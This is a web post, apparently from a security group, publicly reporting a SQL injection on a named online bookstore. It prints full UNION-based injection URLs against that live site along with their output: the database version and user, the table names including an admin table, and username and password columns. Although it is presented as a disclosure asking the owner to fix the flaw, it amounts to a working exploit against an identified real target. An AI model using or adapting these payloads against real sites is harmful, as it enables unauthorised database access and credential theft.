PlanetCreator.Net’s Security Team Member Info Freakzz <infofreakzzz(at)gmail.com> has reported another critical SQL Injection (vulnerability) on http://www.irrawaddystore.com owned by Irrawaddy Publishing Group.

These are some information from Vulneral Site http://www.irrawaddystore.com :

This vulnerability has been alerted to :- [email protected]

@@version,user(),database()

<a href="http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select%201,2,3,4,5,6,group_concat%28@@version,0x3a,user%28%29,0x3a,database%28%29%29,8,9,10,11,12,13,14,15,16,17,18--" target="_blank">http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select</a>


5.0.90-community:irrawadd_user@localhost:irrawadd_store
9

table_name

<a href="http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select%201,2,3,4,5,6,group_concat%28table_name%29,8,9,10,11,12,13,14,15,16,17,18%20from%20information_schema.tables%20where%20table_schema=database%28%29--" target="_blank">http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select</a>
<strong><a href="http://www.irrawaddystore.com/product.php?pro_id=1" target="_blank">store_admin,store_country,</a></strong>

column_name

<a href="http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select%201,2,3,4,5,6,group_concat%28column_name%29,8,9,10,11,12,13,14,15,16,17,18%20from%20information_schema.columns%20where%20table_schema=database%28%29--" target="_blank">http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select</a>
<strong><a href="http://www.irrawaddystore.com/product.php?pro_id=1" target="_blank">id,username,password</a></strong>

We hope that your security staff will look into this issue and fix it as soon as possible.

Thx – Infofreakzzz for sending security updates!

Explore More

What are the steps for security evaluation?

The ethical hacking project comprises three phases, summarized as follows: 1. Preparation: In this phase, a formal contract that contains a non-disclosure clause as well as a legal clause to

Read More

Critical SQL Injection in Planet Myannar Website and Forum

PlanetCreator has reported another critical SQL Injection (vulnerability) on  Planet Myannar Website and Forum http://www.planet.com.mm/ Powered by Inforithm-Maze. SQL injection is a code injection technique that exploits a security vulnerability

Read More

Pay safe with your debit card/ bank card/ ATM card? Best practice to safe guard your PIN

In the world of convenience, people resort to different and convenient ways of spending. One such instance is the debit card which replaces cash. It is so convenient and so

Read More